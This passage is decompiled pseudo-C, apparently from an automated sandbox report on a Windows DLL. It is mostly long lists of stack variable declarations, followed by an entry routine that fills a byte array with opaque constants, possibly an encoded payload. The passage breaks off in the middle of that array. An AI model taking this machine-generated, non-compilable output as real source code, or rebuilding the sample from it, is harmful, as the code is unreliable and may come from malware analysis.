                                                                                                      				char _v1720;
                                                                                                      				char _v1721;
                                                                                                      				char _v1722;
                                                                                                      				char _v1723;
                                                                                                      				char _v1724;
                                                                                                      				char _v1725;
                                                                                                      				char _v1726;
                                                                                                      				char _v1727;
                                                                                                      				char _v1728;
                                                                                                      				char _v1729;
                                                                                                      				char _v1730;
                                                                                                      				char _v1731;
                                                                                                      				char _v1732;
                                                                                                      				char _v1733;
                                                                                                      				char _v1734;
                                                                                                      				char _v1735;
                                                                                                      				char _v1736;
                                                                                                      				char _v1737;
                                                                                                      				char _v1738;
                                                                                                      				char _v1739;
                                                                                                      				char _v1740;
                                                                                                      				char _v1741;
                                                                                                      				char _v1742;
                                                                                                      				char _v1743;
                                                                                                      				char _v1744;
                                                                                                      				char _v1745;
                                                                                                      				char _v1746;
                                                                                                      				char _v1747;
                                                                                                      				char _v1748;
                                                                                                      				char _v1749;
                                                                                                      				char _v1750;
                                                                                                      				char _v1751;
                                                                                                      				char _v1752;
                                                                                                      				char _v1753;
                                                                                                      				char _v1754;
                                                                                                      				char _v1755;
                                                                                                      				char _v1756;
                                                                                                      				char _v1757;
                                                                                                      				char _v1758;
                                                                                                      				char _v1759;
                                                                                                      				char _v1760;
                                                                                                      				char _v1761;
                                                                                                      				char _v1762;
                                                                                                      				char _v1763;
                                                                                                      				char _v1764;
                                                                                                      				char _v1765;
                                                                                                      				char _v1766;
                                                                                                      				char _v1767;
                                                                                                      				char _v1768;
                                                                                                      				char _v1769;
                                                                                                      				char _v1770;
                                                                                                      				char _v1771;
                                                                                                      				char _v1772;
                                                                                                      				char _v1773;
                                                                                                      				char _v1774;
                                                                                                      				char _v1775;
                                                                                                      				char _v1776;
                                                                                                      				char _v1777;
                                                                                                      				char _v1778;
                                                                                                      				char _v1779;
                                                                                                      				char _v1780;
                                                                                                      				char _v1781;
                                                                                                      				char _v1782;
                                                                                                      				char _v1783;
                                                                                                      				char _v1784;
                                                                                                      				char _v1785;
                                                                                                      				char _v1786;
                                                                                                      				char _v1787;
                                                                                                      				char _v1788;
                                                                                                      				char _v1789;
                                                                                                      				char _v1790;
                                                                                                      				char _v1791;
                                                                                                      				char _v1792;
                                                                                                      				char _v1793;
                                                                                                      				char _v1794;
                                                                                                      				char _v1795;
                                                                                                      				char _v1796;
                                                                                                      				char _v1797;
                                                                                                      				char _v1798;
                                                                                                      				char _v1799;
                                                                                                      				char _v1800;
                                                                                                      				char _v1801;
                                                                                                      				char _v1802;
                                                                                                      				char _v1803;
                                                                                                      				char _v1804;
                                                                                                      				char _v1805;
                                                                                                      				char _v1806;
                                                                                                      				char _v1807;
                                                                                                      				char _v1808;
                                                                                                      				char _v1809;
                                                                                                      				char _v1810;
                                                                                                      				char _v1811;
                                                                                                      				char _v1812;
                                                                                                      				char _v1813;
                                                                                                      				char _v1814;
                                                                                                      				char _v1815;
                                                                                                      				char _v1816;
                                                                                                      				char _v1817;
                                                                                                      				char _v1818;
                                                                                                      				char _v1819;
                                                                                                      				char _v1820;
                                                                                                      				char _v1821;
                                                                                                      				char _v1822;
                                                                                                      				char _v1823;
                                                                                                      				char _v1824;
                                                                                                      				char _v1825;
                                                                                                      				char _v1826;
                                                                                                      				char _v1827;
                                                                                                      				char _v1828;
                                                                                                      				char _v1829;
                                                                                                      				char _v1830;
                                                                                                      				char _v1831;
                                                                                                      				char _v1832;
                                                                                                      				char _v1833;
                                                                                                      				char _v1834;
                                                                                                      				char _v1835;
                                                                                                      				char _v1836;
                                                                                                      				char _v1837;
                                                                                                      				char _v1838;
                                                                                                      				char _v1839;
                                                                                                      				char _v1840;
                                                                                                      				char _v1841;
                                                                                                      				char _v1842;
                                                                                                      				char _v1843;
                                                                                                      				char _v1844;
                                                                                                      				char _v1845;
                                                                                                      				char _v1846;
                                                                                                      				char _v1847;
                                                                                                      				char _v1848;
                                                                                                      				char _v1849;
                                                                                                      				char _v1850;
                                                                                                      				char _v1851;
                                                                                                      				char _v1852;
                                                                                                      				char _v1853;
                                                                                                      				char _v1854;
                                                                                                      				char _v1855;
                                                                                                      				char _v1856;
                                                                                                      				char _v1857;
                                                                                                      				char _v1858;
                                                                                                      				char _v1859;
                                                                                                      				char _v1860;
                                                                                                      				char _v1861;
                                                                                                      				char _v1862;
                                                                                                      				char _v1863;
                                                                                                      				char _v1864;
                                                                                                      				char _v1865;
                                                                                                      				char _v1866;
                                                                                                      				char _v1867;
                                                                                                      				char _v1868;
                                                                                                      				char _v1869;
                                                                                                      				char _v1870;
                                                                                                      				char _v1871;
                                                                                                      				char _v1872;
                                                                                                      				char _v1873;
                                                                                                      				char _v1874;
                                                                                                      				char _v1875;
                                                                                                      				char _v1876;
                                                                                                      				char _v1877;
                                                                                                      				char _v1878;
                                                                                                      				char _v1879;
                                                                                                      				char _v1880;
                                                                                                      				char _v1881;
                                                                                                      				char _v1882;
                                                                                                      				char _v1883;
                                                                                                      				char _v1884;
                                                                                                      				char _v1885;
                                                                                                      				char _v1886;
                                                                                                      				char _v1887;
                                                                                                      				char _v1888;
                                                                                                      				char _v1889;
                                                                                                      				char _v1890;
                                                                                                      				char _v1891;
                                                                                                      				char _v1892;
                                                                                                      				char _v1893;
                                                                                                      				char _v1894;
                                                                                                      				char _v1895;
                                                                                                      				char _v1896;
                                                                                                      				char _v1897;
                                                                                                      				char _v1898;
                                                                                                      				char _v1899;
                                                                                                      				char _v1900;
                                                                                                      				char _v1901;
                                                                                                      				char _v1902;
                                                                                                      				char _v1903;
                                                                                                      				char _v1904;
                                                                                                      				char _v1905;
                                                                                                      				char _v1906;
                                                                                                      				char _v1907;
                                                                                                      				char _v1908;
                                                                                                      				char _v1909;
                                                                                                      				char _v1910;
                                                                                                      				char _v1911;
                                                                                                      				char _v1912;
                                                                                                      				char _v1913;
                                                                                                      				char _v1914;
                                                                                                      				char _v1915;
                                                                                                      				char _v1916;
                                                                                                      				char _v1917;
                                                                                                      				char _v1918;
                                                                                                      				char _v1919;
                                                                                                      				char _v1920;
                                                                                                      				char _v1921;
                                                                                                      				char _v1922;
                                                                                                      				char _v1923;
                                                                                                      				char _v1924;
                                                                                                      				char _v1925;
                                                                                                      				char _v1926;
                                                                                                      				char _v1927;
                                                                                                      				char _v1928;
                                                                                                      				char _v1929;
                                                                                                      				char _v1930;
                                                                                                      				char _v1931;
                                                                                                      				char _v1932;
                                                                                                      				char _v1933;
                                                                                                      				char _v1934;
                                                                                                      				char _v1935;
                                                                                                      				char _v1936;
                                                                                                      				char _v1937;
                                                                                                      				char _v1938;
                                                                                                      				char _v1939;
                                                                                                      				char _v1940;
                                                                                                      				char _v1941;
                                                                                                      				char _v1942;
                                                                                                      				char _v1943;
                                                                                                      				char _v1944;
                                                                                                      				char _v1945;
                                                                                                      				char _v1946;
                                                                                                      				char _v1947;
                                                                                                      				char _v1948;
                                                                                                      				char _v1949;
                                                                                                      				char _v1950;
                                                                                                      				char _v1951;
                                                                                                      				char _v1952;
                                                                                                      				char _v1953;
                                                                                                      				char _v1954;
                                                                                                      				char _v1955;
                                                                                                      				char _v1956;
                                                                                                      				char _v1957;
                                                                                                      				char _v1958;
                                                                                                      				char _v1959;
                                                                                                      				char _v1960;
                                                                                                      				char _v1961;
                                                                                                      				char _v1962;
                                                                                                      				char _v1963;
                                                                                                      				char _v1964;
                                                                                                      				char _v1965;
                                                                                                      				char _v1966;
                                                                                                      				char _v1967;
                                                                                                      				char _v1968;
                                                                                                      				char _v1969;
                                                                                                      				char _v1970;
                                                                                                      				char _v1971;
                                                                                                      				char _v1972;
                                                                                                      				char _v1973;
                                                                                                      				char _v1974;
                                                                                                      				char _v1975;
                                                                                                      				char _v1976;
                                                                                                      				char _v1977;
                                                                                                      				char _v1978;
                                                                                                      				char _v1979;
                                                                                                      				char _v1980;
                                                                                                      				char _v1981;
                                                                                                      				char _v1982;
                                                                                                      				char _v1983;
                                                                                                      				char _v1984;
                                                                                                      				char _v1985;
                                                                                                      				char _v1986;
                                                                                                      				char _v1987;
                                                                                                      				char _v1988;
                                                                                                      				char _v1989;
                                                                                                      				char _v1990;
                                                                                                      				char _v1991;
                                                                                                      				char _v1992;
                                                                                                      				char _v1993;
                                                                                                      				char _v1994;
                                                                                                      				char _v1995;
                                                                                                      				char _v1996;
                                                                                                      				char _v1997;
                                                                                                      				char _v1998;
                                                                                                      				char _v1999;
                                                                                                      				char _v2000;
                                                                                                      				char _v2001;
                                                                                                      				char _v2002;
                                                                                                      				char _v2003;
                                                                                                      				char _v2004;
                                                                                                      				char _v2005;
                                                                                                      				char _v2006;
                                                                                                      				char _v2007;
                                                                                                      				char _v2008;
                                                                                                      				char _v2009;
                                                                                                      				char _v2010;
                                                                                                      				char _v2011;
                                                                                                      				char _v2012;
                                                                                                      				char _v2013;
                                                                                                      				char _v2014;
                                                                                                      				char _v2015;
                                                                                                      				char _v2016;
                                                                                                      				char _v2017;
                                                                                                      				char _v2018;
                                                                                                      				char _v2019;
                                                                                                      				char _v2020;
                                                                                                      				char _v2021;
                                                                                                      				char _v2022;
                                                                                                      				char _v2023;
                                                                                                      				char _v2024;
                                                                                                      				char _v2025;
                                                                                                      				char _v2026;
                                                                                                      				char _v2027;
                                                                                                      				char _v2028;
                                                                                                      				char _v2029;
                                                                                                      				char _v2030;
                                                                                                      				char _v2031;
                                                                                                      				char _v2032;
                                                                                                      				char _v2033;
                                                                                                      				char _v2034;
                                                                                                      				char _v2035;
                                                                                                      				char _v2036;
                                                                                                      				char _v2037;
                                                                                                      				char _v2038;
                                                                                                      				char _v2039;
                                                                                                      				char _v2040;
                                                                                                      				char _v2041;
                                                                                                      				char _v2042;
                                                                                                      				char _v2043;
                                                                                                      				char _v2044;
                                                                                                      				char _v2045;
                                                                                                      				char _v2046;
                                                                                                      				char _v2047;
                                                                                                      				char _v2048;
                                                                                                      				char _v2049;
                                                                                                      				char _v2050;
                                                                                                      				char _v2051;
                                                                                                      				char _v2052;
                                                                                                      				char _v2053;
                                                                                                      				char _v2054;
                                                                                                      				char _v2055;
                                                                                                      				char _v2056;
                                                                                                      				char _v2057;
                                                                                                      				char _v2058;
                                                                                                      				char _v2059;
                                                                                                      				char _v2060;
                                                                                                      				char _v2061;
                                                                                                      				char _v2062;
                                                                                                      				char _v2063;
                                                                                                      				char _v2064;
                                                                                                      				char _v2065;
                                                                                                      				char _v2066;
                                                                                                      				char _v2067;
                                                                                                      				char _v2068;
                                                                                                      				char _v2069;
                                                                                                      				char _v2070;
                                                                                                      				char _v2071;
                                                                                                      				char _v2072;
                                                                                                      				char _v2073;
                                                                                                      				char _v2074;
                                                                                                      				char _v2075;
                                                                                                      				char _v2076;
                                                                                                      				char _v2077;
                                                                                                      				char _v2078;
                                                                                                      				char _v2079;
                                                                                                      				char _v2080;
                                                                                                      				char _v2081;
                                                                                                      				char _v2082;
                                                                                                      				char _v2083;
                                                                                                      				char _v2084;
                                                                                                      				char _v2085;
                                                                                                      				char _v2086;
                                                                                                      				char _v2087;
                                                                                                      				char _v2088;
                                                                                                      				char _v2089;
                                                                                                      				char _v2090;
                                                                                                      				char _v2091;
                                                                                                      				char _v2092;
                                                                                                      				char _v2093;
                                                                                                      				char _v2094;
                                                                                                      				char _v2095;
                                                                                                      				char _v2096;
                                                                                                      				char _v2097;
                                                                                                      				char _v2098;
                                                                                                      				char _v2099;
                                                                                                      				char _v2100;
                                                                                                      				char _v2101;
                                                                                                      				char _v2102;
                                                                                                      				char _v2103;
                                                                                                      				char _v2104;
                                                                                                      				char _v2105;
                                                                                                      				char _v2106;
                                                                                                      				char _v2107;
                                                                                                      				char _v2108;
                                                                                                      				char _v2109;
                                                                                                      				char _v2110;
                                                                                                      				char _v2111;
                                                                                                      				char _v2112;
                                                                                                      				char _v2113;
                                                                                                      				char _v2114;
                                                                                                      				char _v2115;
                                                                                                      				char _v2116;
                                                                                                      				char _v2117;
                                                                                                      				char _v2118;
                                                                                                      				char _v2119;
                                                                                                      				char _v2120;
                                                                                                      				char _v2121;
                                                                                                      				char _v2122;
                                                                                                      				char _v2123;
                                                                                                      				char _v2124;
                                                                                                      				char _v2125;
                                                                                                      				char _v2126;
                                                                                                      				char _v2127;
                                                                                                      				char _v2128;
                                                                                                      				char _v2129;
                                                                                                      				char _v2130;
                                                                                                      				char _v2131;
                                                                                                      				char _v2132;
                                                                                                      				char _v2133;
                                                                                                      				char _v2134;
                                                                                                      				char _v2135;
                                                                                                      				char _v2136;
                                                                                                      				char _v2137;
                                                                                                      				char _v2138;
                                                                                                      				char _v2139;
                                                                                                      				char _v2140;
                                                                                                      				char _v2141;
                                                                                                      				char _v2142;
                                                                                                      				char _v2143;
                                                                                                      				char _v2144;
                                                                                                      				char _v2145;
                                                                                                      				char _v2146;
                                                                                                      				char _v2147;
                                                                                                      				char _v2148;
                                                                                                      				char _v2149;
                                                                                                      				char _v2150;
                                                                                                      				char _v2151;
                                                                                                      				char _v2152;
                                                                                                      				char _v2153;
                                                                                                      				char _v2154;
                                                                                                      				char _v2155;
                                                                                                      				char _v2156;
                                                                                                      				char _v2157;
                                                                                                      				char _v2158;
                                                                                                      				char _v2159;
                                                                                                      				char _v2160;
                                                                                                      				char _v2161;
                                                                                                      				char _v2162;
                                                                                                      				char _v2163;
                                                                                                      				char _v2164;
                                                                                                      				char _v2165;
                                                                                                      				char _v2166;
                                                                                                      				char _v2167;
                                                                                                      				char _v2168;
                                                                                                      				char _v2169;
                                                                                                      				char _v2170;
                                                                                                      				char _v2171;
                                                                                                      				char _v2172;
                                                                                                      				char _v2173;
                                                                                                      				char _v2174;
                                                                                                      				char _v2175;
                                                                                                      				char _v2176;
                                                                                                      				char _v2177;
                                                                                                      				char _v2178;
                                                                                                      				char _v2179;
                                                                                                      				char _v2180;
                                                                                                      				char _v2181;
                                                                                                      				char _v2182;
                                                                                                      				char _v2183;
                                                                                                      				char _v2184;
                                                                                                      				char _v2185;
                                                                                                      				char _v2186;
                                                                                                      				char _v2187;
                                                                                                      				char _v2188;
                                                                                                      				char _v2189;
                                                                                                      				char _v2190;
                                                                                                      				char _v2191;
                                                                                                      				char _v2192;
                                                                                                      				char _v2193;
                                                                                                      				char _v2194;
                                                                                                      				char _v2195;
                                                                                                      				char _v2196;
                                                                                                      				char _v2197;
                                                                                                      				char _v2198;
                                                                                                      				char _v2199;
                                                                                                      				char _v2200;
                                                                                                      				char _v2201;
                                                                                                      				char _v2202;
                                                                                                      				char _v2203;
                                                                                                      				char _v2204;
                                                                                                      				char _v2205;
                                                                                                      				char _v2206;
                                                                                                      				char _v2207;
                                                                                                      				char _v2208;
                                                                                                      				char _v2209;
                                                                                                      				char _v2210;
                                                                                                      				char _v2211;
                                                                                                      				char _v2212;
                                                                                                      				char _v2213;
                                                                                                      				char _v2214;
                                                                                                      				char _v2215;
                                                                                                      				char _v2216;
                                                                                                      				char _v2217;
                                                                                                      				char _v2218;
                                                                                                      				char _v2219;
                                                                                                      				char _v2220;
                                                                                                      				char _v2221;
                                                                                                      				char _v2222;
                                                                                                      				char _v2223;
                                                                                                      				char _v2224;
                                                                                                      				char _v2225;
                                                                                                      				char _v2226;
                                                                                                      				char _v2227;
                                                                                                      				char _v2228;
                                                                                                      				char _v2229;
                                                                                                      				char _v2230;
                                                                                                      				char _v2231;
                                                                                                      				char _v2232;
                                                                                                      				char _v2233;
                                                                                                      				char _v2234;
                                                                                                      				char _v2235;
                                                                                                      				char _v2236;
                                                                                                      				char _v2237;
                                                                                                      				char _v2238;
                                                                                                      				char _v2239;
                                                                                                      				char _v2240;
                                                                                                      				char _v2241;
                                                                                                      				char _v2242;
                                                                                                      				char _v2243;
                                                                                                      				char _v2244;
                                                                                                      				char _v2245;
                                                                                                      				char _v2246;
                                                                                                      				char _v2247;
                                                                                                      				char _v2248;
                                                                                                      				char _v2249;
                                                                                                      				char _v2250;
                                                                                                      				char _v2251;
                                                                                                      				char _v2252;
                                                                                                      				char _v2253;
                                                                                                      				char _v2254;
                                                                                                      				char _v2255;
                                                                                                      				char _v2256;
                                                                                                      				char _v2257;
                                                                                                      				char _v2258;
                                                                                                      				char _v2259;
                                                                                                      				char _v2260;
                                                                                                      				char _v2261;
                                                                                                      				char _v2262;
                                                                                                      				char _v2263;
                                                                                                      				char _v2264;
                                                                                                      				char _v2265;
                                                                                                      				char _v2266;
                                                                                                      				char _v2267;
                                                                                                      				char _v2268;
                                                                                                      				char _v2269;
                                                                                                      				char _v2270;
                                                                                                      				char _v2271;
                                                                                                      				char _v2272;
                                                                                                      				char _v2273;
                                                                                                      				char _v2274;
                                                                                                      				char _v2275;
                                                                                                      				char _v2276;
                                                                                                      				char _v2277;
                                                                                                      				char _v2278;
                                                                                                      				char _v2279;
                                                                                                      				char _v2280;
                                                                                                      				char _v2281;
                                                                                                      				char _v2282;
                                                                                                      				char _v2283;
                                                                                                      				char _v2284;
                                                                                                      				char _v2285;
                                                                                                      				char _v2286;
                                                                                                      				char _v2287;
                                                                                                      				char _v2288;
                                                                                                      				char _v2289;
                                                                                                      				char _v2290;
                                                                                                      				char _v2291;
                                                                                                      				char _v2292;
                                                                                                      				char _v2293;
                                                                                                      				char _v2294;
                                                                                                      				char _v2295;
                                                                                                      				char _v2296;
                                                                                                      				char _v2297;
                                                                                                      				char _v2298;
                                                                                                      				char _v2299;
                                                                                                      				char _v2300;
                                                                                                      				char _v2301;
                                                                                                      				char _v2302;
                                                                                                      				char _v2303;
                                                                                                      				char _v2304;
                                                                                                      				char _v2305;
                                                                                                      				char _v2306;
                                                                                                      				char _v2307;
                                                                                                      				char _v2308;
                                                                                                      				char _v2309;
                                                                                                      				char _v2310;
                                                                                                      				char _v2311;
                                                                                                      				char _v2312;
                                                                                                      				char _v2313;
                                                                                                      				char _v2314;
                                                                                                      				char _v2315;
                                                                                                      				char _v2316;
                                                                                                      				char _v2317;
                                                                                                      				char _v2318;
                                                                                                      				char _v2319;
                                                                                                      				char _v2320;
                                                                                                      				char _v2321;
                                                                                                      				char _v2322;
                                                                                                      				char _v2323;
                                                                                                      				char _v2324;
                                                                                                      				char _v2325;
                                                                                                      				char _v2326;
                                                                                                      				char _v2327;
                                                                                                      				char _v2328;
                                                                                                      				char _v2329;
                                                                                                      				char _v2330;
                                                                                                      				char _v2331;
                                                                                                      				char _v2332;
                                                                                                      				char _v2333;
                                                                                                      				char _v2334;
                                                                                                      				char _v2335;
                                                                                                      				char _v2336;
                                                                                                      				char _v2337;
                                                                                                      				char _v2338;
                                                                                                      				char _v2339;
                                                                                                      				char _v2340;
                                                                                                      				char _v2341;
                                                                                                      				char _v2342;
                                                                                                      				char _v2343;
                                                                                                      				char _v2344;
                                                                                                      				char _v2345;
                                                                                                      				char _v2346;
                                                                                                      				char _v2347;
                                                                                                      				char _v2348;
                                                                                                      				char _v2349;
                                                                                                      				char _v2350;
                                                                                                      				char _v2351;
                                                                                                      				char _v2352;
                                                                                                      				char _v2353;
                                                                                                      				char _v2354;
                                                                                                      				char _v2355;
                                                                                                      				char _v2356;
                                                                                                      				char _v2357;
                                                                                                      				char _v2358;
                                                                                                      				char _v2359;
                                                                                                      				char _v2360;
                                                                                                      				char _v2361;
                                                                                                      				char _v2362;
                                                                                                      				char _v2363;
                                                                                                      				char _v2364;
                                                                                                      				char _v2365;
                                                                                                      				char _v2366;
                                                                                                      				char _v2367;
                                                                                                      				char _v2368;
                                                                                                      				char _v2369;
                                                                                                      				char _v2370;
                                                                                                      				char _v2371;
                                                                                                      				char _v2372;
                                                                                                      				char _v2373;
                                                                                                      				char _v2374;
                                                                                                      				char _v2375;
                                                                                                      				char _v2376;
                                                                                                      				char _v2377;
                                                                                                      				char _v2378;
                                                                                                      				char _v2379;
                                                                                                      				char _v2380;
                                                                                                      				char _v2381;
                                                                                                      				char _v2382;
                                                                                                      				char _v2383;
                                                                                                      				char _v2384;
                                                                                                      				char _v2385;
                                                                                                      				char _v2386;
                                                                                                      				char _v2387;
                                                                                                      				char _v2388;
                                                                                                      				char _v2389;
                                                                                                      				char _v2390;
                                                                                                      				char _v2391;
                                                                                                      				char _v2392;
                                                                                                      				char _v2393;
                                                                                                      				char _v2394;
                                                                                                      				char _v2395;
                                                                                                      				char _v2396;
                                                                                                      				char _v2397;
                                                                                                      				char _v2398;
                                                                                                      				char _v2399;
                                                                                                      				char _v2400;
                                                                                                      				char _v2401;
                                                                                                      				char _v2402;
                                                                                                      				char _v2403;
                                                                                                      				char _v2404;
                                                                                                      				char _v2405;
                                                                                                      				char _v2406;
                                                                                                      				char _v2407;
                                                                                                      				char _v2408;
                                                                                                      				char _v2409;
                                                                                                      				char _v2410;
                                                                                                      				char _v2411;
                                                                                                      				char _v2412;
                                                                                                      				char _v2413;
                                                                                                      				char _v2414;
                                                                                                      				char _v2415;
                                                                                                      				char _v2416;
                                                                                                      				char _v2417;
                                                                                                      				char _v2418;
                                                                                                      				char _v2419;
                                                                                                      				char _v2420;
                                                                                                      				char _v2421;
                                                                                                      				char _v2422;
                                                                                                      				char _v2423;
                                                                                                      				char _v2424;
                                                                                                      				char _v2425;
                                                                                                      				char _v2426;
                                                                                                      				char _v2427;
                                                                                                      				char _v2428;
                                                                                                      				char _v2429;
                                                                                                      				char _v2430;
                                                                                                      				char _v2431;
                                                                                                      				char _v2432;
                                                                                                      				char _v2433;
                                                                                                      				char _v2434;
                                                                                                      				char _v2435;
                                                                                                      				char _v2436;
                                                                                                      				char _v2437;
                                                                                                      				char _v2438;
                                                                                                      				char _v2439;
                                                                                                      				char _v2440;
                                                                                                      				char _v2441;
                                                                                                      				char _v2442;
                                                                                                      				char _v2443;
                                                                                                      				char _v2444;
                                                                                                      				char _v2445;
                                                                                                      				char _v2446;
                                                                                                      				char _v2447;
                                                                                                      				char _v2448;
                                                                                                      				char _v2449;
                                                                                                      				char _v2450;
                                                                                                      				char _v2451;
                                                                                                      				char _v2452;
                                                                                                      				char _v2453;
                                                                                                      				char _v2454;
                                                                                                      				char _v2455;
                                                                                                      				char _v2456;
                                                                                                      				char _v2457;
                                                                                                      				char _v2458;
                                                                                                      				char _v2459;
                                                                                                      				char _v2460;
                                                                                                      				char _v2461;
                                                                                                      				char _v2462;
                                                                                                      				char _v2463;
                                                                                                      				char _v2464;
                                                                                                      				char _v2465;
                                                                                                      				char _v2466;
                                                                                                      				char _v2467;
                                                                                                      				char _v2468;
                                                                                                      				char _v2469;
                                                                                                      				char _v2470;
                                                                                                      				char _v2471;
                                                                                                      				char _v2472;
                                                                                                      				char _v2473;
                                                                                                      				char _v2474;
                                                                                                      				char _v2475;
                                                                                                      				char _v2476;
                                                                                                      				char _v2477;
                                                                                                      				char _v2478;
                                                                                                      				char _v2479;
                                                                                                      				char _v2480;
                                                                                                      				char _v2481;
                                                                                                      				char _v2482;
                                                                                                      				char _v2483;
                                                                                                      				char _v2484;
                                                                                                      				char _v2485;
                                                                                                      				char _v2486;
                                                                                                      				char _v2487;
                                                                                                      				char _v2488;
                                                                                                      				char _v2489;
                                                                                                      				char _v2490;
                                                                                                      				char _v2491;
                                                                                                      				char _v2492;
                                                                                                      				char _v2493;
                                                                                                      				char _v2494;
                                                                                                      				char _v2495;
                                                                                                      				char _v2496;
                                                                                                      				char _v2497;
                                                                                                      				char _v2498;
                                                                                                      				char _v2499;
                                                                                                      				char _v2500;
                                                                                                      				char _v2501;
                                                                                                      				char _v2502;
                                                                                                      				char _v2503;
                                                                                                      				char _v2504;
                                                                                                      				char _v2505;
                                                                                                      				char _v2506;
                                                                                                      				char _v2507;
                                                                                                      				char _v2508;
                                                                                                      				char _v2509;
                                                                                                      				char _v2510;
                                                                                                      				char _v2511;
                                                                                                      				char _v2512;
                                                                                                      				char _v2513;
                                                                                                      				char _v2514;
                                                                                                      				char _v2515;
                                                                                                      				char _v2516;
                                                                                                      				char _v2517;
                                                                                                      				char _v2518;
                                                                                                      				char _v2519;
                                                                                                      				char _v2520;
                                                                                                      				char _v2521;
                                                                                                      				char _v2522;
                                                                                                      				char _v2523;
                                                                                                      				char _v2524;
                                                                                                      				char _v2525;
                                                                                                      				char _v2526;
                                                                                                      				char _v2527;
                                                                                                      				char _v2528;
                                                                                                      				char _v2529;
                                                                                                      				char _v2530;
                                                                                                      				char _v2531;
                                                                                                      				char _v2532;
                                                                                                      				char _v2533;
                                                                                                      				char _v2534;
                                                                                                      				char _v2535;
                                                                                                      				char _v2536;
                                                                                                      				char _v2537;
                                                                                                      				char _v2538;
                                                                                                      				char _v2539;
                                                                                                      				char _v2540;
                                                                                                      				char _v2541;
                                                                                                      				char _v2542;
                                                                                                      				char _v2543;
                                                                                                      				char _v2544;
                                                                                                      				char _v2545;
                                                                                                      				char _v2546;
                                                                                                      				char _v2547;
                                                                                                      				char _v2548;
                                                                                                      				char _v2549;
                                                                                                      				char _v2550;
                                                                                                      				char _v2551;
                                                                                                      				char _v2552;
                                                                                                      				char _v2553;
                                                                                                      				char _v2554;
                                                                                                      				char _v2555;
                                                                                                      				char _v2556;
                                                                                                      				char _v2557;
                                                                                                      				char _v2558;
                                                                                                      				char _v2559;
                                                                                                      				char _v2560;
                                                                                                      				char _v2561;
                                                                                                      				char _v2562;
                                                                                                      				char _v2563;
                                                                                                      				char _v2564;
                                                                                                      				char _v2565;
                                                                                                      				char _v2566;
                                                                                                      				char _v2567;
                                                                                                      				char _v2568;
                                                                                                      				char _v2569;
                                                                                                      				char _v2570;
                                                                                                      				char _v2571;
                                                                                                      				char _v2572;
                                                                                                      				char _v2573;
                                                                                                      				char _v2574;
                                                                                                      				char _v2575;
                                                                                                      				char _v2576;
                                                                                                      				char _v2577;
                                                                                                      				char _v2578;
                                                                                                      				char _v2579;
                                                                                                      				char _v2580;
                                                                                                      				char _v2581;
                                                                                                      				char _v2582;
                                                                                                      				char _v2583;
                                                                                                      				char _v2584;
                                                                                                      				char _v2585;
                                                                                                      				char _v2586;
                                                                                                      				char _v2587;
                                                                                                      				char _v2588;
                                                                                                      				char _v2589;
                                                                                                      				char _v2590;
                                                                                                      				char _v2591;
                                                                                                      				char _v2592;
                                                                                                      				char _v2593;
                                                                                                      				char _v2594;
                                                                                                      				char _v2595;
                                                                                                      				char _v2596;
                                                                                                      				char _v2597;
                                                                                                      				char _v2598;
                                                                                                      				char _v2599;
                                                                                                      				char _v2600;
                                                                                                      				char _v2601;
                                                                                                      				char _v2602;
                                                                                                      				char _v2603;
                                                                                                      				char _v2604;
                                                                                                      				char _v2605;
                                                                                                      				char _v2606;
                                                                                                      				char _v2607;
                                                                                                      				char _v2608;
                                                                                                      				char _v2609;
                                                                                                      				char _v2610;
                                                                                                      				char _v2611;
                                                                                                      				char _v2612;
                                                                                                      				char _v2613;
                                                                                                      				char _v2614;
                                                                                                      				char _v2615;
                                                                                                      				char _v2616;
                                                                                                      				char _v2617;
                                                                                                      				char _v2618;
                                                                                                      				char _v2619;
                                                                                                      				char _v2620;
                                                                                                      				char _v2621;
                                                                                                      				char _v2622;
                                                                                                      				char _v2623;
                                                                                                      				char _v2624;
                                                                                                      				char _v2625;
                                                                                                      				char _v2626;
                                                                                                      				char _v2627;
                                                                                                      				char _v2628;
                                                                                                      				char _v2629;
                                                                                                      				char _v2630;
                                                                                                      				char _v2631;
                                                                                                      				char _v2632;
                                                                                                      				char _v2672;
                                                                                                      				char _v2704;
                                                                                                      				void* _v2736;
                                                                                                      				char _v2752;
                                                                                                      				signed long long _v2760;
                                                                                                      				long long _v2768;
                                                                                                      				char _v2776;
                                                                                                      				signed int _v2780;
                                                                                                      				intOrPtr _v2784;
                                                                                                      				signed long long _v2792;
                                                                                                      				signed char _v2796;
                                                                                                      				signed char _v2800;
                                                                                                      				signed char _v2804;
                                                                                                      				signed char _v2808;
                                                                                                      				signed int _t2669;
                                                                                                      				signed long long _t2714;
                                                                                                      				signed long long _t2715;
                                                                                                      				long long _t2716;
                                                                                                      				signed long long _t2748;
                                                                                                      
                                                                                                      				_t2746 = __rdi;
                                                                                                      				_t2703 = __edi;
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __edx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_t2714 =  *0x7c17e008; // 0xefd957cda2cd
                                                                                                      				_t2715 = _t2714 ^ _t2748;
                                                                                                      				_v24 = _t2715;
                                                                                                      				_v2784 = _a16;
                                                                                                      				if (_v2784 == 1) goto 0x7c113fee;
                                                                                                      				goto 0x7c1193e5;
                                                                                                      				_v2796 = 0;
                                                                                                      				_v2800 = 0;
                                                                                                      				_v2768 = 0;
                                                                                                      				_v2792 = 0;
                                                                                                      				E00007FF87FF87C1097DC(_a16, __rcx); // executed
                                                                                                      				_v2792 = _t2715;
                                                                                                      				if (_v2792 == 0) goto 0x7c114039;
                                                                                                      				r8d = 0x5f5e100;
                                                                                                      				E00007FF87FF87C106920(0x5f5e100, 0, __edi, __esp, _v2792, __rdx, __rdi, __r8);
                                                                                                      				E00007FF87FF87C1093A8(_t2715, __rbx, _v2792, __rsi); // executed
                                                                                                      				 *0x7c17ea20 = 0;
                                                                                                      				 *0x7c17ea14 = 0;
                                                                                                      				 *0x7c17ea24 = 0;
                                                                                                      				 *0x7c17ea18 = 0;
                                                                                                      				 *0x7c17ea1c = 0;
                                                                                                      				 *0x7c17ea10 = 0;
                                                                                                      				_v2632 = 0x62;
                                                                                                      				_v2631 = 0xfa;
                                                                                                      				_v2630 = 0x28;
                                                                                                      				_v2629 = 0x18;
                                                                                                      				_v2628 = 0x56;
                                                                                                      				_v2627 = 0x18;
                                                                                                      				_v2626 = 0x3d;
                                                                                                      				_v2625 = 0x31;
                                                                                                      				_v2624 = 0x39;
                                                                                                      				_v2623 = 0x13;
                                                                                                      				_v2622 = 0x33;
                                                                                                      				_v2621 = 9;
                                                                                                      				_v2620 = 5;
                                                                                                      				_v2619 = 0x64;
